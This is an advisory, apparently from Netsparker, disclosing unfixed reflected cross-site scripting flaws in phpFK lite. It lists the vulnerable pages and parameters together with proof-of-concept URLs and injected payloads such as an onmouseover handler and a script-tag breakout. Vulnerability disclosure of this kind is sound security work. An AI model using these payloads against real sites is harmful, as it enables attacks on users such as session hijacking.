*Information:* Advisory by Netsparker Name: Multiple Cross-site Scripting Vulnerabilities in phpFK Affected Software: phpFK Affected Versions: lite-version Homepage: https://www.frank-karau.de/ Vulnerability: Reflected Cross-site Scripting Severity: 7.4 High Status: Not Fixed CVSS Score (3.0): CVE-2017-18364 CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N Netsparker Advisory Reference: NS-19-006 *Technical Details:* /faq.php (Query Based (Query String)) Parameter Name : Query Based Parameter Type : Query String Attack Pattern : '"--> Proof URL : http:// {domain}/faq.php?'"--> /members.php (Query Based (Query String)) Parameter Name : Query Based Parameter Type : Query String Attack Pattern : '"--> Proof URL : http:// {domain}/members.php?'"--> /members.php (search (GET)) Parameter Name : search Parameter Type : GET Attack Pattern : x%22+onmouseover%3dnetsparker(0x0069A0)+x%3d%22 Proof URL : http:// {domain}/members.php?search=x"%20onmouseover=netsparker(0x0069A0)%20x="&sort=username /members.php (search (POST)) Parameter Name : search Parameter Type : POST Attack Pattern : x%22+onmouseover%3dnetsparker(0x006EBA)+x%3d%22 /search.php (Query Based (Query String)) Parameter Name : Query Based Parameter Type : Query String Attack Pattern : '"--> Proof URL : http:// {domain}/search.php?'"--> /user.php (user (GET)) Parameter Name : user Parameter Type : GET Attack Pattern : %3c%2ftitle%3e%3cscRipt%3enetsparker(0x001122)%3c%2fscRipt%3e Proof URL : http:// {domain}/user.php?user= For more information: https://www.netsparker.com/web-applications-advisories/ns-19-006-reflected-cross-site-scripting-in-phpfk/